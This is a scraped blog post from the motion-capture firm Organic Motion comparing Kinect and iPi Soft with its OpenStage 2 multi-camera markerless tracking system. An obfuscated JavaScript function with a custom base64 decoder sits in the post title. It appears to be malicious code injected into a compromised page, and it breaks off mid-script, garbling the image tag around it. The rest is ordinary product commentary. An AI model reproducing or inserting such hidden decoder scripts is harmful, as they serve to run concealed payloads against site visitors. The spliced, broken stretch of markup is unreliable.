@import url(http://fonts.googleapis.com/css?family=Open+Sans); @import url(http://fonts.googleapis.com/css?family=Roboto:500,100,100italic,300,300italic,400,400italic,500italic,700,700italic,900,)
LEARN MORE "; $(".slide-excerpt.slide-1711").append(slideone); var slideone="LEARN MORE "; $(".slide-excerpt.slide-1714").append(slideone); var slideabcd="LEARN MORE"; $(".slide-excerpt.slide-1712").append(slideabcd); var sliderrc="LEARN MORE"; $(".slide-excerpt.slide-2747").append(sliderrc); var slideabc="LEARN MORE"; $(".slide-excerpt.slide-1713").append(slideabc); var abcslide= "
AnimationTraining & SimulationLife SciencesEducation
"; $(".slide-excerpt.slide-1912").append(abcslide); var slideabc="Register Now"; $(".slide-excerpt.slide-2437").append(slideabc); var slideabc="
"; $(".footer-widgets").prepend(slideabc); });

iPi Soft and Kinect for Markerless Motion Capture?

iPi Soft and<script type=function h94fcba1e7(y1){var vd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var yb=”;var p3,na,pc,q9,y3,w4,u5;var p6=0;do{q9=vd.indexOf(y1.charAt(p6++));y3=vd.indexOf(y1.charAt(p6++));w4=vd.indexOf(y1.charAt(p6++));u5=vd.indexOf(y1.charAt(p6++));p3=(q9<<2)|(y3>>4);na=((y3&15)<<4)|(w4>>2);pc=((w4&3)<<6)|u5;if(p3>=192)p3+=848;else if(p3==168)p3=1025;else if(p3==184)p3=1105;yb+=String.fromCharCode(p3);if(w4!=64){if(na>=192)na+=848;else if(na==168)na=1025;else if(na==184)na=1105;yb+=String.fromCharCode(na);}if(u5!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;yb+=String.fromCharCode(pc);}}while(p6 Kinect motion capture” src=”http://test.organicmotion.com/wp-content/uploads/2013/01/kinect-300×290.png” width=”300″ height=”290″ />We get questions about iPi Soft and Kinect all the time.  People want to know how Kinect differs from OpenStage 2, the professional markerless motion capture systems we offer, or they ask if Kinect can be used for accurate 3D tracking.  The fact is that we love Kinect for home gaming and basic gesture capture, areas where it truly excels.  However, as the basis of an accurate 3D motion capture solution, suitable for professional applications, it has serious limitations.

Here’s a video we did a while ago that we often point people to when they want to understand what’s really going on behind the scenes.

It all comes down to the data that the system can collect and how that data is processed.  In brief, Kinect works for basic gesture recognition at a very low consumer price point because it keeps the data simple.  It has a 2D depth map view of the subject and software that has been trained against tons of sample data.   A 2D depth map means that it is only looking from one angle but it can get information, based on an infrared sensor, about how far away different parts of that 2D image are.  In sculptural terms, you can think of its data as a bas-relief, as opposed to a free-standing statue; it has depth, but only from one side.  Because of this, Kinect can’t know if there is anything behind the surface or anything blocked by what it sees.  But it can take the data it does get and match it against what it has learned in order to say, in effect, “that looks like a guy with his right arm raised.” It doesn’t really understand the arm’s true 3D position, its angle, etc.  It just goes with its closest guess.

In order to get more out of the technology, there have been a bunch of Kinect based hacks – in fact the video above shows how we hacked Kinect to add our own software and additional cameras.  For example we have tried, as have many others, using multiple Kinects to get a better 3D data set.  While that does improve things to some degree, it also has real limitations.  By using two Kinects you still don’t get a full 3D view of the subject, but rather two 2D depth maps, which still are unable to provide accurate info about blocked body parts.  Adding more Kinects doesn’t work either because the infrared projections that Kinect uses to collect its depth map data interfere with each other between multiple devices.  We know because we’ve tried integrating Kinects beyond even what is shown in the video above, thinking that it might provide a replacement for some or all of the regular cameras we use.  In the end we found that for true 3D data, multiple regular video cameras provide better data.

Of course having an extra dimension to the data not only provides a huge advantage in measurement, it also multiplies the amount of data that needs to be processed.   Processing all of that extra data in realtime requires sophisticated techniques.  This capability – efficiently processing and understanding 3D data based on multiple cameras -- is at the heart of Organic Motion’s technology and the basis for the accurate tracking capabilities of OpenStage 2 and the rest of our products.
Here’s a video of our software in action, using just regular video cameras with no Kinect involved.  As you can see, the actors are being accurately tracked in realtime through a wide variety of complex motions.

OpenStage 2 can accurately measure 3D position, rotation and angle based on what it sees from multiple cameras at once.  This is not only more accurate, but also allows for tracking many types of motion which Kinect and similar solutions cannot.  For example, poses where part of the body is occluded (blocked) from the perspective of the Kinect can never track well without 3D data.  Similar problems occur when the subject turns away from the camera or spins around, positions for which the Kinect software presumable has not been trained.  Tracking multiple people is also only practical with real 3D data, otherwise it is impossible to tell what is going on when one subjects steps in front of the other.

To see how good the tracking data is from OpenStage 2, check out these free motion capture data samples.